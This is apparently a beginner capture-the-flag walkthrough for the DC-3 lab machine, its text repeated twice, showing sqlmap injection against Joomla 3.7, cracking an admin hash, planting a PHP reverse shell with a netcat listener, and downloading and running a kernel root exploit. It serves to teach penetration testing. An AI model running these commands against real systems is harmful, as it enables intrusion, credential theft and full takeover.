Hello friends! Today we are going to take another boot2root challenge known as “DC-3”. The credit for making this VM machine goes to “DCAU” and it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download it from here.
Security Level: Beginner
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
We found our Targets IP Address 192.168.1.104; Our next step is to scan our targets IP Address with nmap.
From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.
So, we navigate to port 80 by exploring target IP in the web browser and read the text message of the admin, moreover the website was running on Joomla CMS as found above.
So to identify installed Joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.
We looked for Joomla 3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied the exploits 42033.txt file on our machine and read it contents. It revealed a Command for Sqlmap along with a vulnerable URL.
Then we executed given below sqlmap command and with the help of it we look for the Database names that revealed database 5 entries as shown in the image given below where I notice joomladb.
Let’s again use Sqlmap to look for the tables and column.
After getting the table names, we have dumped the contents of table #_users using sqlmap, which revealed credentials which that come in handy to log into JOOMLA. But the password is encoded, we need to crack it. Time to fire up John up.
We have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.
Username- admin
Password- snoopy
Let’s login into Joomla as admin.
After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.
On the other side, we set up a netcat listener. Upon Execution, we got the shell of the target system. To get a proper shell, we have used the python one-liner to spawn the TTY shell.
From the LSB description, we clearly knew for this version of Ubuntu has a direct exploit which can be used to get the root access and found our final flag.
Without wasting time, we found a privilege escalation exploit for ubuntu 16.04. We have downloaded it and extracted it.
After running the exploit, we have easily got the root access and thus got our Final flag.
Security Level: Beginner
Penetrating Methodology:
- Discovering Targets IP
- Network scanning (Nmap)
- Surfing HTTP service port
- Searching exploits via searchsploit
- Using SQLMAP to dump databases information
- Using John the Ripper to Crack the Password
- Login into JOOMLA
- Inject malicious PHP Reverse Shell Code
- Using Netcat for obtaining reverse connection
- Exploit the kernel
- Getting root access
- Reading Final flag
Walkthrough
Let’s start off with scanning the network to find our target.
netdiscover
We found our Targets IP Address 192.168.1.104; Our next step is to scan our targets IP Address with nmap.
Code:
nmap -A 192.168.1.104From nmap result we found only HTTP service is running on port 80 and we got to know that JOOMLA CMS is installed on this website.
So, we navigate to port 80 by exploring target IP in the web browser and read the text message of the admin, moreover the website was running on Joomla CMS as found above.
So to identify installed Joomla version, we checked its Readme file. We can clearly come to know about the version of Joomla 3.7, I think this is might come in handy.
We looked for Joomla 3.7 in searchsploit and found JOOMLA SQL INJECTION exploit. We copied the exploits 42033.txt file on our machine and read it contents. It revealed a Command for Sqlmap along with a vulnerable URL.
Then we executed given below sqlmap command and with the help of it we look for the Database names that revealed database 5 entries as shown in the image given below where I notice joomladb.
Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]Let’s again use Sqlmap to look for the tables and column.
Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb --tables --batchAfter getting the table names, we have dumped the contents of table #_users using sqlmap, which revealed credentials which that come in handy to log into JOOMLA. But the password is encoded, we need to crack it. Time to fire up John up.
Code:
sqlmap -u "http://192.168.1.104/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -D joomladb -T '#__users' -C name,password --dump --batchWe have saved the hash in our system and use john the ripper to crack the hash. Now we have both the credentials to log into Joomla.
Username- admin
Password- snoopy
Let’s login into Joomla as admin.
After spending some time exploring, we got an idea to add a malicious PHP code (available inside kali: /usr/share/webshells/php) in index.php of beez3 template for getting reverse shell as shown below.
On the other side, we set up a netcat listener. Upon Execution, we got the shell of the target system. To get a proper shell, we have used the python one-liner to spawn the TTY shell.
Code:
nc -lvp 1234
python -c 'import pty;pty.spawn("/bin/bash")'
uname -a
lsb_release -aFrom the LSB description, we clearly knew for this version of Ubuntu has a direct exploit which can be used to get the root access and found our final flag.
Without wasting time, we found a privilege escalation exploit for ubuntu 16.04. We have downloaded it and extracted it.
Code:
cd /tmp
wget https://www.exploit-db.com/exploits/39772
unzip 39722.zip
ls
cd 39772
ls
tar -xvf exploit.tarAfter running the exploit, we have easily got the root access and thus got our Final flag.
Code:
ls
cd ebpf_mapfd_doubleput_exploit
ls
./compile.sh
ls
./doubleput
cd root
ls
cat the-flag.txt